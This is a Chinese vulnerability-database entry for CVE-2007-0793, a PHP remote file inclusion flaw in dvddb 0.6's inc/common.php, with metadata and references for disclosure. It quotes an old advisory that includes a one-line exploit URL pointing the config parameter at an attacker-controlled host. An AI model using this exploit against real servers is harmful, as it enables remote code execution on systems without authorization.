GlobalMegaCorp dvddb 'inc/common.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191828 漏洞类型 未知
发布时间 2007-02-06 更新时间 2007-02-06
CVE编号 CVE-2007-0793 CNNVD-ID CNNVD-200702-086
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86649
https://cxsecurity.com/issue/WLB-2007020026
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-086
|漏洞详情
GlobalMegaCorpdvddb0.6版本的inc/common.php中存在PHP远程文件包含漏洞。远程攻击者可以借助config参数中的一个URL,执行任意PHP代码。
|漏洞EXP
########################################################################
###
#
#
# Title		: dvddb-0.6 media remote file include vuln.
# Author	: Blaster
# Download	: http://globalmegacorp.org/dvddb/dvddb-0.6.zip
# Contact	: msn (at) bl4ster (dot) net [email concealed]
#
#
# Vuln Code: 
# require($config /"themes");
#
#
#
# ExpLoit	: http://[target]/[path]/inc/common.php?config=[attacker]
#
#
#
########################################################################
##
#
# GreetZ: BLaCKWHITE, HackerBox.Eu
#
########################################################################
##
|受影响的产品
GlobalMegaCorp DVDdb 0.6
|参考资料

来源:BUGTRAQ
名称:20070204dvddb-0.6mediaremotefileincludevuln.
链接:http://www.securityfocus.com/archive/1/archive/1/459149/100/0/threaded
来源:OSVDB
名称:33679
链接:http://osvdb.org/33679
来源:SREASON
名称:2221
链接:http://securityreason.com/securityalert/2221